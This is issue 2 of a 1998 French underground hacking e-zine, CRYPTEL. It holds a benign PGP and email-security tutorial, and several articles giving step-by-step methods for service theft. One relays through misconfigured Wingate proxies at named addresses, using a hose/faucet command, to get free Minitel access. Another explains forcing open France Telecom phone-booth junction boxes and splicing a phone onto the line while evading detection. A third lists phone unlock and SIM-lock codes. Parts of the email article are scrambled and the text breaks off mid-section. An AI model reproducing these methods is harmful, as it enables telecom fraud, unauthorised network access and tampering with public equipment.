__ __ _ _ __ ____ __ _

/ _)/ )( | )/ \(_ _)/ _)/ )2
( (_( \ \ /( ()_) )( ( _| (_
\__)\_\_)(_) \_) (_ ) \__)\__)

>> 10110101| <<

e-z-i-n-e

u-n-d-e-r-g-r-o-u-n-d

l-i-b-e-r-a-l-i-s-t-e

EDITION No 2 / Decembre 1998 / � CRYPTEL

> staff: Editeur / vatoo
Ecrivains \ vatoo [vatoo75@altern.org]
\ aaah [Aaah@mail.dotcom.fr]
\ ced99 [ced99@club-internet.fr]
\ cyberjunk [Snipper@hotmail.com]
\ pr0tek [pr0tekti0n@hotmail.com]

________________
>> Avertissement:

L' organisation CRYPTEL a �crit ce texte dans
le but UNIQUE d' informer les gens. Ces quelques lignes
cod�es par des 1 et des 0 ne sont donc qu' � prendre d' un
point de vue �ducatif. Ce texte n' est pas ill�gal, c' est
son application qui l' est, alors soyez s�rieux, ne le
mettez pas en pratique, car vous pourriez �tre poursuivis en
justice et nous ne serions pas responsables de vos actes. L'
information n' a jamais tu� personne. Les actes, si.

__________
>>Sommaire:

_________ ________ ____
/ article \_______________________/ auteur \_____/ Ko \___
|����������������������������������������������������������|
| 2.1 Edito vatoo 3 |
| 2.2 Minitel gratuit aaah 5 |
| 2.3 Phreak cabines FT aaah 5 |
| 2.4 Email & securite pr0tek 22 |
| 2.5 Secrets of 30 GSM vatoo 25 |
| 2.6 Introduction a Win NT cyberjunk 19 |
| 2.7 Prefixes nationaux vatoo 3 |
| 2.8 Password files aaah 4 |
| 2.9 Elephant bleu ced99 4 |
| 2.10 GSM a la loupe vatoo 15 |
| 2.11 Trashing reports aaah 12 |
| 2.12 Paris Underground vatoo 24 |
| 2.13 Ze End vatoo ? |

|__________________________________________________________|
'����������������������������������������������������������'

______________
2.1>>Editorial:

Decembre 1998...a l' aube de l' an 2000! Et dire que dans quelques jours,
nous allons passer en 1999, numero qui marque les esprits, meme les plus
incredules. Comment rester indifferent face a ce que represente le futur
passage de millenaire? C' est un changement purement psychologique, mais
deja, l' arrivee en 1999 va nous faire prendre conscience que notre
societe n' est pas a la hauteur de notre epoque. Les francais vont devoir
changer d' etat d' esprit, ne plus rester les conservateurs franchouillards
qu' ils ont ete jusqu' a present.
Le temps est venu a la vulgarisation des technologies (comme le net, un peu
nouveau pour les francais, alors qu' il existe depuis presque 40 ans!),
avec un droit a l' information plus important pour le citoyen.
La lutte contre le fascisme et l' intolerance vont etre decisives pour
l' avenir de notre societe. Si les conditions de vie ne plaisent pas plus
aux francais, la montee du FN va continuer jusqu' a ce qu' il soit trop
tard pour faire marche arriere. C' est a present qu' il faut reagir, et
se battre pour ses ideaux. Soyez pour la liberte d' expression, la tolerance,
et montrez-le au quotidien. Il faut se dire que ce n' est pas en attendant
la reaction des autres que la situation va changer. Le Nouveau Digital
Underground Francais est la pour soutenir cette position, surtout dans les
moments les plus delicats.

Passons a des choses un peu moins serieuses: la deuxieme edition de notre
ezine, que vous tenez entre vos disques durs. Notre equipe a essaye de
faire un mag encore plus complet et plus precis pour satisfaire votre soif
cannibale de connaissances. Je dirais meme qu' on s' est bien dechires
pour vous fournir ce numero. Nous avons essaye de rester originaux, et ne pas
remixer des articles deja traites de nombreuses fois. Cela va d' une visite
des catacombes parisiennes au phreak de cabines FT(exclu), en passant par
les secrets de 30 GSM, ou bien encore le trash d' une agence FT.
Vous avez surement remarque que des auteurs sont apparus, comme Le Saint
(alias Cyberjunk), ced99 ou pr0tek. En fait ils ont ecrit pour le #2 en tant
qu' auteurs ponctuels (mis a part ced), et peuvent apparaitre encore dans les
editions a venir, ca ne depend que d' eux.

On souhaite sincerement que ce numero vous apporte quelque chose. Nous sommes
toujours tres interesses par vos creations (articles, scans de pbx, vmb, passwords,
ou autres delires..). On attend aussi vos reactions, vos critiques, vos injures sur

ce file, et eventuellement vos remerciements!

En tout cas, toute l' equipe de CRYPTEL exige que vous passiez un reveillon du
jour de l' an terrible a ne pas vous en remettre pendant 3 jours, si vous voyez
ce que je veux dire ;)

(�`'�.�(�`'�.�_.��`�._.��`�.(�`'�.� �.�'��).��`�._.��`�._�.�'��)�.�'��)
) Minitel GRATOS ?! ) 2.2 ( Aaah@mail.dotcom.fr (
(_�.�'�(_�.�'�`�._.��`�._.��(_�.�'��`'�.�_)`�._.��`�._.��`'�.�_)`'�.�_)

En lisant les newsgroups j'ai trouv� un post assez interressant sur le minitel
la technique semble valide et FT est parait il au courant du probl�me. Si j'ai

plus d'infos vous cryptel vous en serez inform� :

�a y est, c'est confirm�, on peut avoir le minitel gratuit (communications
incluses) gr�ce � France Telecom Interactive (la bo�te qui s'occupe de Wanadoo &
compagnie). La d�marche est tr�s simple, mais n�cessite tout de m�me du logiciel
(UNIX me para�t particuli�rement adapt� ;)
Le principe : FTI permet � ses abonn�s d'avoir acc�s au minitel via Internet
moyennant un petit abonnement. L'heureux abonn�, quand il se connecte au serveur
web de wanadoo (www.wanadoo.fr ) voit alors appara�tre une rubrique Minitel, et
tous les frais normalement revers�s au prestataire de service seront d�bit�s sur
une petite note qui viendra avec la facture Wanadoo pour l'abonnement � Internet.

Hum, mais comment cela marche-t-il? Pourquoi certains ont-ils cette rubrique
Minitel et pas d'autres? Le serveur Web wanadoo "sait" quelles sont les adresses
IP pouvant acc�der � un service, et lesquelles n'y ont pas droit.
L� o� �a devient int�ressant, c'est que certaines bo�tes, trop heureuses d'avoir
le Turbowanadoo (le nom de la formule ADSL "internet rapide"), veulent pouvoir
en profiter depuis tout le r�seau local. Et, sur le conseil de FTI (j'insiste sur
ce point), elles installent Wingate (les techniciens de chez FTI connaissent mal
Linux, de leur propre aveu, et Wingate a le m�rite d'�tre bon march�).

Pr�parez les mouchoirs, car par d�faut (et les valeurs par d�faut ne sont pas
chang�es dans 90% des cas), Wingate offre un service de redirection telnet
absolument merveilleux. Pour s'en convaincre, essayez de faire un petit "telnet
193.252.178.17". A l'invite Wingate, tapez (par exemple) "nephtys.lip6.fr 23".
Nous sommes alors connect�s au service ftp de jussieu, mais en passant par le
Wingate. Jussieu a l'impression que c'est la machine h�bergeant le Wingate qui
appelle.

Bien. Le proxy http des ADSL est 193.252.178.5, port 8888. Il reste donc � �crire
un petit programme qui, recevant une connexion sur le port (mettons) 3000, va
contacter 193.252.178.17, et entrer la cha�ne de caract�res "193.252.178.5 8888"
et ensuite, se contenter de faire la FIFO entre le flux de la connexion entrante
sur le port 3000 et le flux de la connexion sortante vers le Wingate. Je sugg�re
l'utilisation des outils "hose" et "faucet", qui redirigent des sockets TCP/IP
vers les entr�es/sorties standard. La ligne � taper ressemblera � "hose 3000 -c sh
faucet 193.252.178.17 (echo 193.252.178.5 8888 ) -slave -in -out"... bon je n'ai
pas mes manpages sous la main, c'est assez proche.

On lance cette commande sur une b�cane (disons toto). Ensuite, dans votre brouteur
favori, � la ligne "proxy", mettez l'adresse toto, port 3000. Et zou. Maintenant,
vous acc�dez � Internet, mais exactement comme si vous �tiez sur la machine
h�bergeant le Winproxy. Le proxy de chez FTI croira que l'appel vient de la b�cane
du Winproxy, et autorisera donc l'acc�s au minitel.

Bon, le seul "hic" c'est que si �a se trouve, je vous ai donn� l'adresse d'un
Winproxy qui n'a pas pris l'option Minitel. Qui sait? En tout cas, la technique ne
se restreint pas aux lignes ADSL, les acc�s PPP standard peuvent eux aussi �tre des

cibles.

-=-
Aaah@mail.dotcom.fr

(�`'�.�(�`'�.�_.��`�._.��`�.(�`'�.� �.�'��).��`�._.��`�._�.�'��)�.�'��)
) Phreak cabine FT ) 2.3 ( Aaah@mail.dotcom.fr (
(_�.�'�(_�.�'�`�._.��`�._.��(_�.�'��`'�.�_)`�._.��`�._.��`'�.�_)`'�.�_)

Mardi 14 Octobre je suis dans une cabine t�l�phonique entrain de t�l�phoner
(non sans blagues ? ;-) mes cl�s tombent par terre, je m'accroupis pour les
ramasser et l� au surprise je remarque le jackpot

----------------------------------
| |
| |
| |
| */Voir Photo cabine.jpg*/ |
| |
| |
| |
----------------------------------

Et oui il est l� :-) tout b�te et sous nos yeux. C'est une boitier en fer ferm�
par 2 points : un en haut et un en bas. Pour ouvrir ce boitier 2 manieres s'ouvrent

� toi :

* Tu es un bourrin, prenez une pince CROCO et essayer de forcer
* Tu fais dans la finesse et le raffinement, tu achetes une cl� passe

EDF/GDF attention ce type de cl� ne se trouve que dans les bonnes
quincailleries (70 frs environ) inutile de te pointer chez
CASTORAMA ou autres et demander ce type de cl� ... Voil� � quoi �a
ressemble

----------------------------------
| |
| |
| |
| */Voir Photo cle.jpg*/ |
| |
| |
| |
----------------------------------

Moteur.... ACTION ! Voil� maintenant comment je te conseille de proc�der. Prends
un sac � dos et met z'y un t�l�phone tout bete avec sa prise d�nud� (cad vous
virez l'embout il ne faut garder que le fil) un petit tournevis plat, la pince
croco ou le passe EDF et partez en qu�te d'un cabine FT isol� (pas sur les champs
�lys�es). Une fois dedans tu ouvres la boite (tous tes instruments sont cach�s dans

le sac � tes pieds) et voil� ce que tu trouves

----------------------------------
| |
| |
| |
| */Voir Photo boitier.jpg*/ |
| |
| |
| |
----------------------------------

La premi�re chose que tu fais tu coupes le disjoncteur comme �a la lumi�re de la
cabine sera �teinte tu seras plus au calme pour op�rer et moins exposer aux

regards.
Ensuite la partie qui nous interresse c'est celle avec les fils de plusieurs
couleurs
raccord�e a plusieurs bouts rouges. A partir de l� tu es un grand gar�on tu prends
ton t�l�phone, ton tournevis et tu fous les fils de ta ligne tel dans ce de la
cabine.
Respecte bien les couleurs. Une fois fait bah BINGO tu as un tel gratos raccord� a
une
ligne France Telecom tu d�tournes une grosse bo�te plut�t qu'un pauvre particulier
c'est bien mieux. Un autre d�bouch� s'ouvre � toi tu fous une black box et on
t'appelle
gratos sur une ligne propre � FT donc tu t'en fous des moins de 4 min puisque meme
si
les commutateurs reperent la couille ils vont surveiller leur propre ligne :-) lol.

Quelques remarques en VRAC :
****************************
@ Le contenu des boitiers varie celon le type de cabine. Tu peux tomber sur un type

de boitier avec un cache pot gris qui prot�ge le raccordement pour l'ouvrir 2
solutions : tu l'arraches (mais �a craint un peu ...) tu essayes de d�viser la vis
qui est en fait un minuscule point, pour �a tu prends une pointe de clou tu
enfonces
bien et tu d�vises ... NB: Ce type de boitier est quand meme rare.

@ Changer r�guli�rement de cabine on ne sait jamais

@ Pour savoir si quelqu'un a ouvert le boitier suite � votre passage mettez avant
de
partir un petit bout de scotch sur la fente du boitier comme �a si a votre prochain

passage il n'y est plus c'est que quelqu'un est pass� par l� ...

-=-

Si quelqu'un fait du lock picking, possede des passes france telecom (cabine,
r�partiteur,
etc...) je suis TRES interress� mailez-moi Aaah@mail.dotcom.fr On compte sur vous
car on
va pas tout faire nous m�me, participez c'est cool et on est ouvert � toutes vos
propositions.

(�`'�.�(�`'�.�_.��`�._.��`�.(�`'�.� �.�'��).��`�._.��`�._�.�'��)�.�'��)
) Email & securite ) 2.4 ( pr0tekti0n@hotmail.com (
(_�.�'�(_�.�'�`�._.��`�._.��(_�.�'��`'�.�_)`�._.��`�._.��`'�.�_)`'�.�_)

Ce texte est r�serv� aux personne ayant de grandes connaissances dans le domaine
"Internet".

Introduction

Avec l'utilisation toujours croissante du courrier �lectronique (E-Mail) comme mode
de com-
munication sur Internet ainsi que d'autres services, la s�curit� de ce type de

Ils sont tenus � la disposition du destinataire pour qu'il les recoive sur simple demande. Lors de cette transmission. Voila pourquoi les personnes indiscretes disposent de multiples occasions pour lire les messages d'autres utilisataires. toute personne peux masquer son identit� sur le Net. une d�claration d'amour :) ). Les informations transmises par courrier �lectronique sur Internet le sont en texte clair.. Il est possible d'intercepter des messages �l�ctroniques. 1) Les E-Mail priv�s. Votre E-Mail restera un certains temps sur un serveur. Ces textes sont stock�s sur n'importe quel ordinateur Internet. Votre employeur n'aurait aucune difficult� � les lire. vous �changiez des d�tails intimes (je sais pas moi. des paquets de donn�es sont envoy�es sur un r�seau (Internet). l' E-mail n'est pas sur.Le courrier �lectronique est la plupart du temps transmis via le SMTP (simple mail transfert protocol). Imaginons que vous vous serviez du courrier �lectronique pour envoyer des messages dans une entreprise. De nombreux utilisateurs se posent des questions telles que: Q: Peux-on intercepter le courrier �lectronique ? R: Oui.. il est n�cessaire que vous prot�giez vos lettres des regards indiscrets. 2) Probleme de s�curit�. Il se pourait qu'au cours de cette courte correspondance. . vous pourrez d�couvrir pourquoi les services mail ne sont pas surs et comment y rem�dier. l' E-Mail n'est pas directement transmis au destinataire mais sauvegard� temporairement. Tres souvent.courrier devient de plus en plus importante. en clair! C'est bien sur � ce moment l� que les messages peuvent etre lus et copier par des responsables du serveur ou par des hackers. ces "voyeurs" doivent acc�der � des parties d�termin�es sur un r�seau: . Internet et les services de courrier �lectronique que l'on peux y trouver ne sont pas surs! A travers ce document. Q: Peux-on envoyer du courrier �lectronique sous un faux nom ? R: Oui. En fait. Tenez-vous r�ellement � ce que votre employeur soit parfaitement au courrant de votre vie priv�e? Si c'est non (enfin j'espere).

de garantir fiabilit� et authenticit�. Quand une communication est transmise via divers ordinateurs. jusqu'� un certain point. Grace � cette cl� toutes les autres personnes chiffrent le courrier destin� � un correspondant.. Bien que tous les E-Mail disposent d'une adresse d'exp�diteur.multimania. 5) Systeme � cl� publique. Chaque utilisateur cr�e deux cl�s: La premiere est communiqu�e de facon "publique". un original ou ce que l'on pourrait appeler "falsification".. je ne suis pas tres fort en dessin.On pourrait se demander alors si des messages sont lus sur Internet et combien. CLE | | | | | | | . 3) Identification. cette information n'est pas fiable! Il est facile de s'amuser � envoyer des messages sous un faux nom (ceci est expliqu� dans de nombreux zine de hacking tels Frhack. Suivre des messages reste possible jusqu'� un certain point. Voici un shema. De tels proc�d�s que si vous disposez d'un moyen de communication sur pour vous mettre d'accord sur une cl� (ne faite pas ca sur IRC).. dans l'�tat pr�sent. 4) Codage d' E-Mail. _________________________________________________| | Fichier | | | ------------.. d'autre proced�s de codage permettant la transmition de la fameuse cl� sont tres souvent utilis�s de nos jours. et notre bon vieux t�l�phone n'est pas plus sur qu'une lettre. c'est � peine si l'on sait r�ellement d'ou elle vient � l'arriv�e. |------------| | Exp�diteur |________________________________________________ -------------- |----------. En fait. aucun programme ne peut � ce jour garantir 100 % de s�curit�. l'exp�diteur et le destinataire s'accordent sur une "cl�" d�termin�e. Il est donc presque impossible de distinguer si un E-Mail est..| |Destinataire| | -------------- ------------. Puisqu'il est rare de trouver une voie de communication sure. allez sur www. Dans le cas le plus simple. Il existe de nombreux systemes de codage qui permettent..com/gripsou/ ). Ce n'est qu'avec la seconde cl� perso que le correspondant pourra d�chiffrer son courrier: C'est la raison pour laquelle cette cl� personnelle doit etre secrete.

Bien que les possibilit�s de PGP pr�sent�es ici nous permettent d�j� de coder et de signer des messages. l'authenticit� du courrier et d�montr�e.De les signer �lectroniquement. on cr�e un "extrait" ayant les caract�ristiques de ce message. Il permet: . il doit d�chiffrer l'extrait cod� au moyen de la cl� publique de l'exp�diteur et doit cr�er un autre extrait (et oui. ---------. Si les deux extraits se recoupent. d'autres questions se posent. | | | -----------.) du courrier lisible. le destinataire utilise pour le d�codage la cl� publique. Cette methode. La premiere concerne la maniere dont une personne peut faire parvenir un message chiffr� � un autre utilisateur avec lequel elle n'a encore aucun contact. Cet "extrait" est ensuite cod� � l'aide de la cl� et transmis avec le courrier si le destinataire veut v�rifier l'authenticit� de la signature. | | | Envois |________| | -----------. disponible dans PGP (le logiciel). 7) PGP suite A partir d'un message que l'on aura sign�... cela signifie que le message a �t� manipul�..Pretty Good Privacy est le systeme � cl� publique le plus r�pendu. il ne faut pas oublier que la cl� doit rester secrete... Si A voulait communiquer avec B. Si le d�chiffrage du courier ne peux etre effectu�. Pour v�rifier l'authenticit� d'une signature. 8) Cl� PGP.. . Prennons un exemple: Une personne A boudrait communiquer avec une peronne B qu'il ne connait pas encore..De coder des lettres. | |___________________|Internet|_____| Envois| __________________| ---------. | | | | ---------. )de lire des courriers sign�s. ---------- 6) PGP PGP. .. Une signature �letronique garantit qu'un courrier a r�ellement �t� r�dig� par une personne d�termin�e. il lui demanderait d'abord sa cl� publique. permet aux utilisateurs ne poss�dant pas PGP (oui et ils ne sont pas rares :( .

Et si une personne C pouvait intercepter ce message et envoyer � la place de B. Toute personne peut donc y trouver des cl�s . une r�ponse avec une fausse cl�.. Comment peut on alors reduire cette possibilit� d'aggression ? 9) Serveur de Cl�. C serait alors le seul � pouvoir lire ces lettre. qui recuillent des cl�s publiques et qui les envoient sur demande (sympas non ?). ______________ ______________ _______________ | | | | | | | Personne A | | Personne B | | Personne C | |____________| |____________| | _____________| | | | | | | | | | _______|__________ | ___| | | _______|___________ _______| ___________ | Cl� publique | | | | | |_________________| | Cl� publique | | Utilisation de | | |_________________| | la cl� de A | | | | _________________| | _______________________| | |___________| | _______|__________ | | | _______| __________ | Acces Internet | | | |________________| | Acces Internet | | | ________________| | | | | | | _______|__________ | | | |______________________________________| | | Serveur Cl� | | |________________|_________________________________________________| | | | Cl� publique | |_________________| Les serveurs de cl�s sont des ordinateurs d'acces public. A penserait communiquer avec B alors qu'elle communiquerait avec C..

Il faut bien sur que la personne puisse vous envoyer ses empreintes digitales :) .. Le principe sur lequel elle est fond�e est le suivant: des personnes qui se connaissent ou bien.publiques des autres utilisateurs (seulement si ils sont enregistr�s). Toute cl� publique PGP sera clairement marqu�e d'une "empreinte digitale". Si B d�sire signer la cl� publique de A. ne l'oublions pas. Ceci devrez vous donnez une id�e des moyens qu'il faudrait utiliser pour casser une ... signent leur cl�s publiques.. La fiabilit� de codage tel que PGP repose sur l'importance des moyens que devrait employer un agresseur pour calculer la cl� priv�e. alors il la code avec sa propre cl� priv�e. Les serveurs de cl�s pourraient pour etre pris en otage par des hackers. 11) "Empreintes digitales". Elle permet d'attribuer de maniere fiable une cl� PGP � une personne.box.sk Sachez qu'il aura fallu 8 mois � une organisation pour cracker une telle cl�. 10) La "chaine" de confiance. ______________ ______________ | | Confiance | | | Personne A |-----------------><------------------| Personne B | |____________| :) |____________| | | | | | | ______|_______ ________|______ | | ________________ | | | Cl� priv�e |___________| |_______| Cl� publique | |____________| | Logiciel PGP | |______________| |______________| La signature d'une cl� correspond � celle d'un message. si une personne vous transmet son empreinte digitale. vous pourrez vous en procurer tres certainement sur http://neworder.. 12) S�curit� avec PGP. Une telle empreinte est aussi unique que chaque cl�. En effet il existe des "cracker PGP".. Une chaine de confiance est cr�e quand de nombreux utilisateurs PGP signent entre eux des cl�s publiques. Par exemple. vous serez certain que la cl� est bien la sienne. qui sont sure de l'existence r�elle de l'autre.

Il existe diff�rentes versions de PGP: .Des versions non commerciales pour un usage aux Etats-Unis et le Canada UNIQUEMENT.. l'usage non commercial de PGP est normalement possible puisque le code source RSA a �t� export� ill�galement des Etats-Unis.L'un des deux proc�d�s de cryptographie employ� dans PGP. .En Europe. ne peux etre utiliser qu'aux Etats-Unis.txt | Fichier de configuration pour PGP | |_________________| __________________________________________________________________________| | | | | setup.doc | Remarques sur la config de PGP | |_________________| __________________________________________________________________________| | | | | pgpdoc1.exe | Programme ex�cutable | |_________________| __________________________________________________________________________| | | | | config. L'utilisation de PGP est � priori ill�gale car: .Des versions internationnales non commerciales. 14) Installation de PGP sous DOS! PGP est autant un programme ex�cutable dispo pour de nombreux sytemes en source C..Des versions commerciales pour les E-U et le Canada. vous aurez les fichiers suivants: ___________________________________________________________________________________ ___________ | | | | Nom du fichier | Contenu du fichier | |_________________| __________________________________________________________________________| | | | | pgp. 13) Logiciels PGP (enfin!). . Si vous t�l�chagez un programme PGP.cl�. � savoir RSA. .txt | La doc officielle de PGP | .

Ce fichier n'est pas "sensible".bat: SET PGPPATH=C:le_rep_ou_vous_avez_mis_PGP SET PATH=C:le_rep_ou_vous_avez_mis_PGP. vous pourrez commencer � . Des que vous aurez param�tr� PGP et prot�g� vos petits fichiers.bin qui est aussi important.pgp et secring. Ajoutez ensuites ces lignes dans votre fichier autoexec.pgp est TRES important puisque c'est dedant qu'est inscrite votre cl� priv�e! Mettez donc plutot ce fichier sur disquette que vous conserverez en lieu sur.pgp . Vous devez aussi prot�ger le fichier randseed.txt Dans le tableau suivant. PGP utilise deux fichiers pour la m�morisation des cl�s: pubring.pgp Il inscrit les cl�s publiques de vos correspondants dans le pubring. vous trouverez les parametres importants: ___________________________________________________________________________________ ___________ | | | | Parametre | Remarque | |______________________| _____________________________________________________________________| | | | | MyName = "Dupond" | Vous devez bien sur mettre votre nom | |______________________| _____________________________________________________________________| | | | | Language = fr | Langue � choisir | |______________________| _____________________________________________________________________| | | | | Armor = on | Activer le PGP pour coder vos e-mail | |______________________| _____________________________________________________________________| Si vous d�sirez utiliser PGP sur un autre syteme.|_________________| __________________________________________________________________________| Lisez premierement toutes les infos des fichiers txt et doc. En revanche le secring. 15) PGP "Keyrings". lisez bien le CONFIG. Info sur le config.%PATH% SET TZ=MET-1DST TZ correspond � Time Zone.TXT.

dupond@cool. or any other printable characters. entrez ceci pour avoir des infos sur votre cl�: "pgp -kvvc" Vous obtiendrez: Key ring:"pubring. 16) D�duter. medium fast. good security 3) 1024 bites. Ex: test. bien que le 1) soit suffisant. fast but less secure 2) 768 bits. une cl� normale.txt Pour le codage tapez: "pgp -eat test. highest security Choose 1.txt" Vous obtiendrez un fichier test. Cr�ez d'abord le fichier que vous voulez crypter. if you have an E-mail adress."Military" grade.fr Enter a user ID for your public key: Et maintenant le mot de passe: You need a pass phrase to protect your RSA secret key.utiliser PGP. medium speed.asc . Un identificateur de cl� vous sera demand�: You need a user ID for your public key. Dupond .pgp" Type Byte/KeyID Date UserID pub 1024/DDB189E1 1998/12/24 Test-Key for Daniel Dupond Key fingerprint = 54 6D C8 D4 98 F9 A3 55 55 AE 1A 69 sig DDB189E1 Test-Key for Daniel Dupond 1 matching found 17) Comment crypter et d�crypter des messages. Enter your phrase here: ATTENTION: Ce mot de passe est tres important pour la protection de votre cl�! Apres le mot de passe on vous demande de tapez n'importe quoi: We need to generate 968 random bits. Please enter some random text on your keyboard until you hear the beep: Vous avec maintenant cr�er votre cl�. spaces. fallowed by your E-mail adress enclosed in ngle brackets.Low commercial grade. punctuation. For example: Daniel. The desired form for this user ID is your name. Q: Comment cr�er une cl� personnelle ? R: tapez: "pgp -kg" le programme vous demandera aussi la longeur de la cl�: Pick your RSA key size: 1) 512 bits. This is done by measuring the time intervals between your keystrokes.High commercial grade. slow. 2 or 3 enter desired number of bits: Je vous conseille de prendre le 2). Your pass phrase can be any sentence or phrase and may have many words.

pgp. ___________________________________________________________________________________ ___________ | | | | Fonction PGP | Commande | |______________________| _____________________________________________________________________| | | | | Codage d'un texte | pgp -e{fichier texte} {ID du destinataire} | | avec la cl� du dest.com Et bien sur en fancais: http://www. n'h�sitez pas � m'envoyer un mail! |Pr0teK| .asc" 18) Les autres commandes PGP. si vous d�sirez plus d'information ou de l'aide.net/pub/pgp Bon site en anglais bien sur: http://www.Pour le d�cryptage tapez: "pgp -d test. | | |______________________| _____________________________________________________________________| | | | | Signature | pgp -s{fichier texte} [-u {votre ID}] | |______________________| _____________________________________________________________________| | | | | D�codage d'un texte | pgp {fichier cod�} [-o {fichier texte lisible}] | | avec examen de la | | | signature | | |______________________| _____________________________________________________________________| 19) Source PGP et sites Internet Serveur officiel: ftp://ftp.fr/Informatique_et_multimedia/Securite_et_cryptage/Pretty_Good_Pri vacy__PGP_/ 20) Fin !!! Voila c'est tout.pgp.yahoo.

��`�.<.* <._.Pour activer la localisation de l' operateur (a utiliser avec precaution).�'�(_�. TRACES Menu d' indicateurs de canaux ARRETS .�(�`'�.* * <. Le Master Code pour le "MENU Code" et "Prod.�'��`'�.* CLR pour voir la version du software.(�`'�.��`�. ils ne peuvent donc etre utilises qu' avec une certaine tonalite.�'�`�.Un mauvais code vous fait sortir du menu.�'��)�.�'��) ) Secrets of 30 GSM ) 2.�_. <._. et vous aurez .�'��). La plupart des telephones ALCATEL sont 'SIM Locked'.� �.��`�. Il y a une rumeur komme koi un programme permettant de calculer le code a partir de l' IMEI.��`�. => OK" Puis on entre 025121992. Ca ne peut etre desactive qu' en obtenant le code special par Alcatel. Les 2 suivants fonctionnent aussi: 906081C2* 15900807* "UNBLOCKING" " PIN ? " 0000* "UNBLOCKING" "PIN AGAIN " 0000# ____________ ERICSSON 198 *#06# pour voir le numero IMEI ________________ ERICSSON 218/337 *#06# pour voir le numero IMEI -> * <.? VIDER ARRETS Pressez OK et le cell repond: 'This action is executed!' CTRL CHARGE Montre la tension du chargeur et de la batterie. le telephone beep pour avertir ke c' est le dernier essai. trainerait sur le net . ou par votre fournisseur d' acces. Le menu secret apparait._. Au dernier essai..�_)`'�. Il y a 5 essais pour y parvenir._�.(�`'�.5 ( vatoo ( (_�. ca donne: "PRODUCT CODE" "VAL._.) IMEI: 3300 1453 1139 420 Lorsqu' un cell est active avec une carte. DAMIER affiche le test._. code" de l' Alcatel One Touch Easy est 25228353.�_) ______________________ Alcatel One Touch Easy Entrez 000000 et pressez *.��(_�.�_)`�. OK "ENTER SPECIAL CODE" **05* comme avec Motorola "UNBLOCKING" " PUK ? " 10608CC2*.��`�.��`�.��`'�._.

Initialise la configuration de l' utilisateur Pour les versions plus recentes: FLASH . comme 951024 1054 Apres etre entre dans ce mode.Le numero de production du soft.Montre 254 messages dans le langage courant INIT EEPROM MMI . Appeler le numero xxx ATH Raccrocher le cell AT+CFUN=? Definir les niveaux de fonctionnalite dans l' ordre de consommation d' energie. Le GH337/GF337 est toujours "CXC 125 005" PRG . Commandes pour la version 940810 1310 : TEXT CHECK . 9: GND 10: Permet le micro et l' ecouteur externes. AT+CBC Voir le niveau de la batterie. 12: Haut-parleur externe. Il y a deux methodes: > * < < * > * montre la version du soft. 5: Sortie +5V ? Sources au-dessus de 100 mA.* CLR pour voir la version du software. Commandes pour la version 950626 1405 : CXC (numero) . Caracteres SMS b7 0 0 0 0 1 1 1 1 b6 0 0 1 1 0 0 1 1 b5 0 1 0 1 0 1 0 1 b4 b3 b2 b1 0 1 2 3 4 5 6 7 0 0 0 0 0 SP D SP 0 @ P � p 0 0 0 1 1 � SP ! 1 A Q a q 0 0 1 0 2 $ F " 2 B R b r . Pinout du GA628: 1: Chargeur. 2: Entree Serie. tres petit signal (10 mV). Commandes d' Edition AT+GMI Identification du fabricant AT+GMO Identification du modele AT+GMR Identification de la derniere revision AT+GMM ATDxxx. 8: Permet le micro et l' ecouteur externes.* <. Chaque menu est different e fonction du type du software.Redemarre le telephone au moment ou l' on entre le numero de PIN. 3: GND 4: Sortie Serie. Haute lors de l' appel. 11: Microphone externe.'Not allowed' inscrit sur le cadran. Un mode de test secret est accessible sir le GH337. a connecter a un GND. a connecter a un GND. vous pouvez vous ballader avec les fleches < et > dans le menu. comme 940810 1310 > * < < * < * montre la version du soft. 6: Entree Digitale.<.Indication pour la programmation ________________ ERICSSON 318/388 *#06# pour voir le numero IMEI -> * <. 7: Sortie Digitale.

pressez et maintenez la touche flechee droite.<.* <.<. = M � m � 1 1 1 0 14 � � . choisissez 'Yes' Si le menu clignote. pressez et maintenez le touche flechee gauche. il est en service. allez dans READ. Pour voir les menus supplementaires (sur les versions les + recentes).* pour voir la version du soft -> * <. il n' est pas en marche. Essayez de taper ca: >*<<*<* ou < est la fleche gauche et > la fleche droite ______________ ERICSSON GA628 *#06# pour voir le numero IMEI -> * <. S' il ne clignote pas. allez dans les appels non-aboutis.(dans les menus supplementaires) Choisissez 'Yes' puis on va vous demander . > N � n � 1 1 1 1 15 � � / ? O � o � Notes: SP Espace LF Line feed CR Carriage return Menus caches Allez dans 'MissedCall' Pressez la fleche -> pendant une sec ou 2 Le Menu d' options s' affiche Choisissez 'Yes'. et choisissez le type de menu. allez dans le menu supplementaire. empty directory. < L � l � 1 1 0 1 13 CR � .* -> pour lire tous les textes programmes < * * < pour voir le status du reseau (attendre 3 s) 0 # pour appeler le dernier numero compose * # 0 0 0 0 # pour initialiser le menu en anglais Pour voir le niveau de la batterie quand le cell est eteint. K � k � 1 1 0 0 12 � � .* <. Vous pouvez le mettre en service ou non en choisissant 'Yes'. empty directory. Pour editer le book de votre cell.0 0 1 1 3 � G # 3 C S c s 0 1 0 0 4 � L $ 4 D T d t 0 1 0 1 5 � W % 5 E U e u 0 1 1 0 6 � P & 6 F V f v 0 1 1 1 7 � Y ' 7 G W g w 1 0 0 0 8 � S ( 8 H X h x 1 0 0 1 9 � Q ) 9 I Y i y 1 0 1 0 10 LF X * : J Z j z 1 0 1 1 11 � SP + . . pressez rapidement on/off. Comment utiliser le menu . Pour voir les menus supplementaires (sur les versions les + anciennes).Bk". et choisissez le type de menu.EditMenus? -. et choisissez "EditPh.

pressez 'No'.) Comment activer le menu de v�rouillage SP. Apr�s. Lorsqu' il demande l' accord. GH788.Lorsque vous mettez en place un menu. <**< v�rouiller le r�seau ? si vous appuyez sur YES. le menu de v�rouillage ne sera plus accessible. et si vous voulez changer quelque chose. vous avez 5 essais pour entrer NSCK. vous pouvez la changer en pressant '*'. il dit la position par la fleche droite. Si un code invalide est entr� 5 fois. il faut un code special qui n'est pas disponible � l'utilisateur final . le t�l�phone n'acceptera pas la carte. vous avez 5 essais pour entrer NCK. vous pouvez choisir sa position. GH768. le menu ke vous avez selectionne reste sur la deuxieme fleche a droite! Lorsque tout est fait. le t�l�phone sort du menu. et si la fleche est -> . si vous ins�rez la carte SIM d'un SP diff�rent. choisissez 'Non'. Une fois que le t�l�phone est v�rouill� sur un SP. Derni�re version du logiciel : <970905> Brochage externe : 1 = + external power supply 2 = RS232 input (TTL) 3 = GND (digital) 4 = RS232 output (TTL) 5 = +5V output 6 = Test 7 = Mute 8 = Internal/external . <**<< v�rouiller le sous r�seau ? si vous appuyez sur YES. votre t�l�phone peut se v�rouiller sur le r�seau d'un SP.Version du logiciel 